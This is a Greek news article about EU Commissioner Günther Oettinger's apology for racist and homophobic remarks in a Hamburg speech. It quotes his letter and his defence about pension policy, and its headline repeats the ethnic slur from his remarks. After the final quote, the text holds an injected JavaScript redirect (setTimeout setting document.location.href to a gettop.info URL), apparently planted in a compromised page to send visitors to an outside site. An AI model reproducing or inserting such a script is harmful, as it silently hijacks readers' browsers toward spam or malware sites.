Συγγνώμη Έτινγκερ για… σχιστομάτηδες και ομοφυλόφιλους

0
7

 

Πριν από λίγες ημέρες ο Επίτροπος Ψηφιακής Οικονομίας προκάλεσε σάλο με τις ρατσιστικές και ομοβικές δηλώσεις του για τις οποίες -είπε- ότι αναπρήχθησαν μεμονωμένα και δεν αντιπροσώπευαν τα όσα ακριβώς είπε.

Ωστόσο για να λύσει τις παρεξηγήσεις προχώρησε σε σύνταξη επιστολής απολογητικού χαρακτήρα:

«Είχα τον χρόνο να προβληματιστώ σχετικά με την ομιλία μου, και μπορώ τώρα να δω ότι οι λέξεις που χρησιμοποίησα δημιούργησαν άσχημα συναισθήματα και μπορεί ακόμη και να πλήγωσαν κάποιους. Δεν είχα τέτοια πρόθεση και θα ήθελα να ζητήσω συγνώμη για οποιοδήποτε ανάρμοστο σχόλιο«.

Κατά τη διάρκεια ομιλίας του σε επιχειρηματίες στο Αμβούργο εξέφρασε τη λύπη του για το ότι μπορεί να χορηγηθεί σύνταξη στις νοικοκυρές και κατήγγειλε τους γάμους των ομοφυλοφίλων που «σύντομα θα επιβληθούν» στη Γερμανία.

Σήμερα ο Γκ. Έτινγκερ απαντά τα εξής: «Πρόθεσή μου ήταν να αφυπνίσω το γερμανικό κοινό. Αν οι Γερμανοί εστιάσουν την πολιτική τους στη μείωση του ορίου ηλικίας συνταξιοδότησης, αύξηση των συντάξεων κλπ, κανείς δεν θα πρέπει να εκπλαγεί αν χάσουμε την παγκόσμια μάχη για την ανταγωνιστικότητα. Το ίδιο ισχύει και για την Ευρώπη στο σύνολό της. Πρέπει να διπλασιάσουμε τις προσπάθειές μας κι όχι να πάρουμε έναν υπνάκο στον καναπέ. Πρέπει να τεθούν οι σωστές προτεραιότητες – με ένα δημοκρατικό και ισορροπημένο τρόπο. Στην ομιλία μου έφερα κάποια παραδείγματα (και για άλλη μια φορά ζητώ συγγνώμη αν τα λόγια μου προκάλεσαν αρνητικά συναισθήματα.)«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here